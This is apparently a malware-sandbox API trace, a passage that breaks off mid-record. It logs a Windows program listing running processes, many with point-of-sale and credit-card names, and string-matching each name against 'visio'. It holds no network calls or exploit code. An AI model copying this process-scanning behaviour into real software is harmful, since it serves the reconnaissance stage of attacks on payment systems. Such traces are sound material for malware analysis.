[0100.256] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0100.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.257] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357b1d8 [0100.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x357b1d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0100.257] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0100.257] StrStrIA (lpFirst="afr38.exe", lpSrch="visio") returned 0x0 [0100.257] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0100.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.258] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357b208 [0100.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x357b208, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0100.258] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0100.258] StrStrIA (lpFirst="aldelo.exe", lpSrch="visio") returned 0x0 [0100.258] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0100.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.259] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x357b118 [0100.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x357b118, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0100.259] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0100.259] StrStrIA (lpFirst="ccv_server.exe", lpSrch="visio") returned 0x0 [0100.259] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0100.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0100.260] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x357df28 [0100.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x357df28, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0100.261] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0100.261] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="visio") returned 0x0 [0100.261] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0100.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0100.262] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357de68 [0100.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x357de68, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0100.262] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0100.262] StrStrIA (lpFirst="creditservice.exe", lpSrch="visio") returned 0x0 [0100.262] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0100.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.263] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357b2e0 [0100.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x357b2e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0100.263] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0100.263] StrStrIA (lpFirst="edcsvr.exe", lpSrch="visio") returned 0x0 [0100.263] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0100.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.264] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357b220 [0100.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x357b220, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0100.264] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0100.264] StrStrIA (lpFirst="fpos.exe", lpSrch="visio") returned 0x0 [0100.264] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0100.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.265] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357b250 [0100.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x357b250, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0100.265] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0100.265] StrStrIA (lpFirst="isspos.exe", lpSrch="visio") returned 0x0 [0100.265] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0100.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.266] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357df68 [0100.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x357df68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0100.266] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0100.266] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="visio") returned 0x0 [0100.267] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0100.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.305] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b268 [0100.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x357b268, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0100.306] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0100.306] StrStrIA (lpFirst="omnipos.exe", lpSrch="visio") returned 0x0 [0100.306] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0100.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.307] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357b280 [0100.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x357b280, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0100.307] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0100.307] StrStrIA (lpFirst="spcwin.exe", lpSrch="visio") returned 0x0 [0100.307] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0100.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0100.308] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x357dce8 [0100.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x357dce8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0100.308] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0100.308] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="visio") returned 0x0 [0100.308] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0100.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.309] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356d6e0 [0100.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x356d6e0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0100.309] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0100.309] StrStrIA (lpFirst="utg2.exe", lpSrch="visio") returned 0x0 [0100.309] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0100.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.310] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356d4b8 [0100.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x356d4b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0100.310] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0100.310] StrStrIA (lpFirst="saying.exe", lpSrch="visio") returned 0x0 [0100.310] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0100.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.311] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356d668 [0100.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x356d668, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0100.311] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0100.311] StrStrIA (lpFirst="ripe.exe", lpSrch="visio") returned 0x0 [0100.311] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0100.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.312] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356d608 [0100.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x356d608, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0100.312] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0100.312] StrStrIA (lpFirst="acoustic.exe", lpSrch="visio") returned 0x0 [0100.312] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0100.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.313] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356d560 [0100.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x356d560, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0100.313] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0100.313] StrStrIA (lpFirst="mail.exe", lpSrch="visio") returned 0x0 [0100.313] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0100.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.314] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356d578 [0100.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x356d578, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0100.314] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0100.314] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="visio") returned 0x0 [0100.314] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.316] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d590 [0100.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356d590, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.316] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.316] StrStrIA (lpFirst="svchost.exe", lpSrch="visio") returned 0x0 [0100.316] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0100.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.317] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d5a8 [0100.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x356d5a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.317] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0100.317] StrStrIA (lpFirst="dllhost.exe", lpSrch="visio") returned 0x0 [0100.317] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0100.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.318] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356d620 [0100.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356d620, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0100.318] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0100.318] StrStrIA (lpFirst="taskhostw.exe", lpSrch="visio") returned 0x0 [0100.318] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0100.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.319] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356d5f0 [0100.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x356d5f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0100.319] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0100.319] StrStrIA (lpFirst="UsoClient.exe", lpSrch="visio") returned 0x0 [0100.319] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0100.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.320] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356d770 [0100.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356d770, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0100.320] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0100.320] StrStrIA (lpFirst="taskhostw.exe", lpSrch="visio") returned 0x0 [0100.320] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, 